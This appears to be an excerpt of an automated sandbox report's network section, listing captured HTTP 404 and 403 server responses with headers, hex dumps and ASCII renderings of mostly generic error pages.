Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:00 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-167.ec2.internalX-Request-Id: beb0a71e-b7c3-4bbd-be71-8e8c7d476198Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:00 GMTServer: ApacheLast-Modified: Thu, 26 Jul 2007 15:09:38 GMTETag: "8d7ff8d4-2b5-4362c03e5f083"Accept-Ranges: bytesContent-Length: 693Content-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:59 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://adm-works.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 0d 0a Data Ascii: 16<!DOCTYPE html><html
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.19.9.1Date: Fri, 22 Dec 2023 20:15:00 GMTContent-Type: text/htmlContent-Length: 575Connection: keep-aliveLast-Modified: Wed, 05 Oct 2011 15:41:30 GMTETag: "23f-4ae8f0ab47e80"Data Raw: 3c 64 69 76 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 3c 62 3e 34 30 34 3a 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 62 3e 0a 20 20 20 20 20 20 20 20 3c 62 72 2f 3e 0a 20 20 20 20 20 20 20 20 54 68 69 73 20 65 72 72 6f 72 20 69 73 20 67 65 6e 65 72 61 74 65 64 20 77 68 65 6e 20 74 68 65 72 65 20 77 61 73 20 6e 6f 20 77 65 62 20 70 61 67 65 20 77 69 74 68 20 74 68 65 20 6e 61 6d 65 20 79 6f 75 20 73 70 65 63 69 66 69 65 64 20 61 74 20 74 68 65 20 77 65 62 20 73 69 74 65 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 3c 62 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 54 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 20 73 75 67 67 65 73 74 69 6f 6e 73 3a 0a 20 20 20 20 20 20 20 20 3c 2f 62 3e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 45 6e 73 75 72 65 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 69 6e 6b 69 6e 67 20 74 6f 20 65 78 69 73 74 73 20 69 6e 20 74 68 65 20 63 6f 72 72 65 63 74 20 66 6f 6c 64 65 72 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 43 68 65 63 6b 20 79 6f 75 72 20 66 69 6c 65 20 6e 61 6d 65 20 66 6f 72 20 63 61 73 65 20 73 65 6e 73 69 74 69 76 69 74 79 20 2e 20 49 6e 64 65 78 2e 68 74 6d 20 69 73 20 6e 6f 74 20 74 68 65 20 73 61 6d 65 20 61 73 20 69 6e 64 65 78 2e 68 74 6d 21 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 64 69 73 61 62 6c 65 20 61 6e 79 20 72 65 77 72 69 74 65 20 72 75 6c 65 73 20 62 79 20 72 65 6e 61 6d 69 6e 67 20 79 6f 75 72 20 2e 68 74 61 63 63 65 73 73 20 66 69 6c 65 20 69 66 20 69 74 20 65 78 69 73 74 73 2e 0a 20 20 20 20 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 0a Data Ascii: <div> <p> <b>404: Page not found</b> <br/> This error is generated when there was no web page with the name you specified at the web site. </p> <p> <b> Troubleshooting suggestions: </b> </p> <p> Ensure the page you are linking to exists in the correct folder. </p> <p> Check your file name for case sensitivity . Index.htm is not the same as index.htm! </p> <p> Temporarily disable any rewrite rules by renaming your .htaccess file if it exists. </p></div>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:00 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeLast-Modified: Fri, 30 Sep 2022 11:47:19 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4677Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 52 6d 73 d3 c8 96 fe 0c bf e2 8c 73 67 80 aa d8 4a 26 61 76 b0 15 df 82 90 0c b9 05 24 9b 84 e5 4e 6d ed 52 6d e9 48 ea 49 ab 8f e8 6e d9 d6 4d cd fe f6 3d dd 92 5f 63 b8 70 77 0d b1 a5 7e 79 ce f3 16 ff f0 fa f2 f4 f6 f7 ab 33 28 5c a9 e0 ea c3 ab b7 17 a7 d0 eb 47 d1 c7 a3 d3 28 7a 7d fb 1a fe fe e6 f6 dd 5b 38 1c 1c c0 8d 33 32 71 51 74 f6 be 07 bd c2 b9 6a 18 45 b3 d9 6c 30 3b 1a 90 c9 a3 db eb 68 ee 51 0e fd b5 ee b1 6f c3 9d 41 ea d2 de f8 71 1c 86 cc 4b a5 ed c9 0e 80 c3 17 2f 5e b4 f7 7a fe d0 50 09 9d 9f f4 50 f7 60 f9 e4 31 50 a4 50 19 ca a4 c2 25 4a 5e 56 79 c0 98 67 3a 3a 3c e4 73 d0 7d e2 12 9d 00 7f ac 8f 9f 6b 39 3d e9 9d 92 76 a8 5d ff b6 a9 b0 07 49 fb 76 d2 73 38 77 91 1f 3e 82 a4 10 c6 a2 3b a9 5d d6 ff b5 07 d1 1a 9a 93 4e e1 f8 f8 e0 18 fa 70 f5 f2 b7 33 78 7f 79 0b e7 97 1f de bf 8e a3 76 ef f1 e3 47 fc 89 7f e8 f7 e1 65 9a c2 8d 92 29 c2 65 ed 2c f4 fb e3 76 cf 26 46 56 0e ac 49 96 02 12 4a 71 f0 c7 e7 1a 4d 33 48 a8 8c da c7 fe d1 e0 68 70 38 28 a5 1e fc 61 7b e3 38 6a 6f 8e 17 74 1e c2 45 49 2e fb b6 b1 d1 1f 36 b2 b2 ac 14 f6 71 5e 09 9d 3e 04 59 8a 5a a9 b3 ae 51 08 8e 8d e9 fc 48 ac 5d f3 72 42 69 73 5f 89 34 95 3a 1f 1e 8c 4a 61 72 a9 f9 21 63 0f fb 99 28 a5 6a 86 05 aa 29 3a 99 88 d1 9f cb 7b 7b de 64 21 35 9a fb ee ce cf 07 d5 1c 44 ed 68 34 93 a9 2b 86 bf fe f2 6b 35 df 79 03 f6 1c 55 ec f7 fd 44 24 77 b9 a1 5a a7 7d 59 8a 1c 87 b5 51 4f 9f 2c f5 86 35 1b f1 49 3e ff 69 36 f8 a3 ca 9f 3c 1b ad 5d 32 58 a1 70 43 4d dd d3 c6 e4 02 65 5e b8 e1 e1 57 68 94 32 fd 2e 1a 7c 7e 90 cb 6c 27 89 f6 a7 df 7c 83 fa 76 2c ec e5 c2 91 99 90 73 54 de 57 64 a5 93 a4 19 47 09 27 a7 38 52 98 b9 e1 d1 0b 46 c9 14 f1 00 ff fe 4f 00 e7 f3 f9 fd da e1 45 ac c7 3e 99 a3 17 ff c6 df 87 fc 38 82 2e b1 90 56 fb d5 3f 5c a4 f7 f5 09 7e 09 b5 5b 9f e2 4b d5 17 4a e6 7a 98 f0 16 9a ef 70 a0 83 83 3d 34 86 4c 42 29 de 87 e2 59 f9 0f 1c 1e 79 ae e1 75 d6 46 f9 eb c1 c1 b7 e2 4d 84 de ae e6 01 ff fb d6 eb 05 59 87 e9 a4 b9 df 1e bf 62 f7 f3 f3 05 3b eb 1a 85 43 e9 d8 83 64 b4 35 f1 5b 07 26 54 57 a4 ef 13 52 64 86 7b 2f 5f 1d 1c 6c 0e fb 79 e7 b0 6f 04 cf d1 59 27 0c 2b 02 f1 c5 11 47 87 3b 47 fc 8b fe af 8d 5c 84 e0 fd 3f 7a fe c5 4a 4c c8 39 2a 19 e5 7e 22 92 bb dc 50 ad d3 be 2c 45 8e c3 da a8 a7 4f a2 24 97 7d db d8 28 ac d9 88 4f b6 57 06 b9 cc 9e 3c 1b ad dd 32 58 21 b7 53 53 f7 b4 51 c8 a2 d5 72 78 fc ed e5 cc c4 e7 4f ab fd 85 1e 78 1e 22 0e df 23 a8 44 9a 4a 9d 0f e1 b0 4d be fd 19 41 a2 50 98 21 33 2d be 75 9a 48 12 32 a9 e4 36 ac c2 81 17 07 3f 8e a0 95 01 bf 3c 67 ec 11 94 52 f7 3b 31 3c ad 5d ea 98 1d 80 a8 1d 8d c0 e1 dc f5 39 c6 9c d7 12 06 47 f3 dd 24 a0 56 70 bf 8e a3 30 73 df 8f 42 bb 51 1e 3d fa 66 04 25 61 db 90 e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:00 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-167.ec2.internalX-Request-Id: af236013-35dc-4114-9c26-52bdaa351214Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:00 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-137.ec2.internalX-Request-Id: 9b02b8d5-9647-4d47-9035-b9b10314356bData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:00 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-181.ec2.internalX-Request-Id: 43515590-ca86-44c5-8c90-97bd6cb1f956Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:00 GMTServer: ApacheUpgrade: h2Connection: UpgradeLast-Modified: Mon, 06 Jun 2005 08:43:43 GMTETag: "31a-3f8dbb37d6dc0;45d2231770ec0Accept-Ranges: bytesContent-Length: 794Content-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 2e 73 74 79 6c 65 33 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 43 43 30 30 30 30 3b 0a 7d 0a 2e 73 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 43 43 43 43 43 43 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 45 43 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 30 70 78 3b 0a 7d 0a 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 0a 3c 68 32 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 79 6c 65 33 22 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 70 61 6e 3e 3c 2f 68 32 3e 0a 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 38 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 77 69 64 74 68 3d 22 34 36 30 22 3e 0a 3c 74 62 6f 64 79 3e 3c 74 72 3e 3c 74 64 20 63 6c 61 73 73 3d 22 73 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 62 6f 64 79 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>404 Not Found</title><style type="text/css"><!--.style3 { font-family: Verdana, Arial, Helvetica, sans-serif; color: #CC0000;}.s { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11px; font-weight: normal;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:00 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-137.ec2.internalX-Request-Id: 408b6f43-c45b-4f82-aefd-02421c334231Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Dec 2023 20:15:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingContent-Encoding: gzipData Raw: 32 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 73 cb cc 49 55 c8 cb 2f 51 48 cb 2f cd 4b d1 e3 02 00 2b 90 a9 21 10 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 24sIU/QH/K+!0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:00 GMTContent-Type: text/html; charset=utf-8Connection: keep-alivex-wix-request-id: 1703276100.7801709999897113245Age: 0Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42X-Seen-By: VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLvRKfhx2uNN4hv3eFGgKFZEa0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRalvTlJZ0NnGdLV+0426SnY8M1FKDjUzEwYyQI8XAr7nX/gSfShFyAtmOtxPQQJ/BIkA==,2UNV7KOq4oGjA5+PKsX47Ad3BAkeAb9lWxcyN70+/DFYgeUJqUXtid+86vZww+nL,VmI+uz0B2qfdV6wbOCEtb2BkR6NTdWt8IJ3Oyc5f+zc=,hUeKicgprlF3Ei9qMBzezHDp2DKwVkOLOSLKHrQkz7w=,WDMzHiyOL7uW518fW2Byr2GuGiStFB9OWrVR4y4nAsbQHalDg5GXgutSG6W0vh+Sw9doegBPDuevU6lQBO5pKA==Vary: Accept-EncodingX-Content-Type-Options: nosniffContent-Encoding: gzipTransfer-Encoding: chunkedData Raw: 34 32 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 df 6f db 36 10 7e cf 5f c1 e8 45 2d 10 8a 71 d6 61 69 26 05 e8 b2 0c cb cb 30 6c 28 b0 a1 28 0a 5a 3c 5b 4c 28 52 25 29 ff 40 d7 ff 7d 77 94 ec 39 71 b0 c6 89 1f 6c f3 c8 bb fb be bb 23 ef 18 2b 8f 39 67 8c f3 cb a3 a3 f2 58 b9 3a ae 3b 60 4d 6c cd 25 ae 39 3f 62 f8 a1 dd 92 64 cc ce b9 ec ba 2a 5b ea d5 b5 f7 ce ff 2e e7 10 de 75 5d 46 07 40 aa 4b 3c 5f b6 10 25 b3 b2 85 2a 5b 68 58 76 ce c7 8c d5 ce 46 b0 91 54 55 6c 2a 05 0b 5d 03 4f 8b 13 6d 75 d4 d2 f0 50 4b 03 d5 e4 84 b5 72 a5 db be fd 4f d0 07 f0 69 25 a7 78 c2 3a f4 b7 71 54 37 d2 07 40 c3 7d 9c f1 f3 9d 8d 26 c6 8e c3 e7 5e 2f aa ec 2f fe fe 1d bf 72 6d 27 a3 46 0b 3b 70 6e ae 2b 50 73 18 f4 a2 8e 06 88 e4 54 5b 55 65 79 87 f4 3e 25 61 ce fe 61 d1 4b 1b 8c 8c 78 b8 14 49 fa 90 ae 82 50 7b dd 45 ed ec 8e 8b 1d 4c 07 44 65 4f cb bb a9 8b 61 c7 ae 75 88 12 56 27 cc ba 99 33 c6 2d 07 95 6d 42 29 75 a5 d1 f6 8e 51 52 ab 4c b7 48 47 74 76 9e b1 c6 c3 ac ca 84 58 2e 97 05 e6 b2 a8 5d 2b 66 12 53 e2 6c 81 5f 19 f3 60 aa 2c 34 98 ba ba 8f 8c e4 7b c6 07 d3 1b 4b 21 62 68 eb a2 93 5e 86 e8 3c 7a 4a 46 31 6f 94 e8 20 62 a3 bd e2 b8 1d d7 62 86 b5 10 c4 af 60 16 80 3a 32 ad 7f 91 35 6a 04 e4 37 b8 8e 6b 03 a1 01 c0 d2 19 d0 47 58 45 91 0e 88 14 f6 1d 9a 03 92 3d bd a7 42 c3 00 f0 ae 9f 1a 5d 8b 49 f1 c3 e4 6d 71 2a 42 72 2f 80 6a 1c 41 63 91 8f a2 04 f1 be ff 52 0c 95 5f 4e 9d 5a 33 23 ed bc ca 00 f3 8f Data Ascii: 427Vo6~_E-qai&0l((Z<[L(R%)@}w9ql#+9gX:;`Ml%9?bd[.u]F@K<_%[hXvFTUl]OmuPKrOi%x:qT7@}&^//rm'F;pn+PsT[Uey>%aaKxIP{ELDeOauV'3-mB)uQRLHGtvX.]+fSl_`,4{K!bh^<zJF1o bb`:25j7kGXE=B]ImqBr/jAcR_NZ3#
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 22 Dec 2023 20:15:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICSet-Cookie: __cf_bm=8I8fc1qdfw2z7BkNCf964OV2et4Vc7n1nPx3ay3Bje0-1703276100-1-AXfOVxEwQUXrvwM7Si0Lb2vXw6DjDkyzsVKqIzsQp9Kh3R/CZlFF09O54n2c44vzdjrEJgbGH5yHH6bQqKAyA/A=; path=/; expires=Fri, 22-Dec-23 20:45:00 GMT; domain=.jaydien.com; HttpOnly; SameSite=NoneServer: cloudflareCF-RAY: 839b08cde9a24c0c-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 00 00 ff ff 03 00 6d 78 95 8e 92 00 00 00 0d 0a Data Ascii: 73(HML),I310Vp/JLIIr$T";Ctv6PiEv0yyr0.mx
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:00 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16Content-Length: 204Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /admin/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Fri, 22 Dec 2023 20:15:00 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 55 90 41 4f c3 30 0c 85 ef fd 15 66 67 98 07 da 31 8a 04 6b 27 26 95 31 a1 ec c0 31 2c 86 44 ca 92 91 b8 4c fd f7 24 1d 12 70 7c f6 f3 e7 67 8b ab f6 79 a5 5e 77 1d 3c aa a7 1e 76 fb 87 7e b3 82 d9 0d e2 a6 53 6b c4 56 b5 97 ce dd 7c 81 d8 6d 67 b2 11 96 8f 5e 0a 4b da 14 c1 8e 3d c9 e5 62 09 db c8 b0 8e 43 30 02 2f c5 46 e0 64 12 6f d1 8c 75 ee 56 fe f1 14 d5 88 93 54 96 20 d1 e7 40 99 c9 c0 fe a5 87 b3 ce 10 0a eb bd b2 20 06 60 eb 32 64 4a 5f 94 e6 02 4f d3 d8 bd 31 8e 5d 0c da fb f1 1a 34 fc 0b d0 50 4a 31 4d 20 0a 87 82 61 4a 05 7e b6 ce 13 70 1a 5d f8 00 8e 30 64 02 1d a0 ab e6 36 1e 86 23 05 ae 75 ab 83 a9 c6 df 64 3f 6b 71 3a a4 5c 55 1f d0 7c 03 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efUAO0fg1k'&11,DL$p\|gy^w<v~SkV\|mg^K=bC0/FdouVT @ `2dJ_O1]4PJ1M aJ~p]0d6#ud?kq:\U\|Y<;0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Dec 2023 20:15:00 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 204Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /admin/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:00 GMTServer: ApacheX-Powered-By: PHP/8.1.26Cache-Control: no-cache, privateVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 39 34 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 74 6d 6c 0d 0a 20 20 20 20 6c 61 6e 67 3d 22 65 6e 20 22 0d 0a 20 20 20 20 64 61 74 61 2d 74 65 78 74 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 0d 0a 20 20 20 20 63 6c 61 73 73 3d 22 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 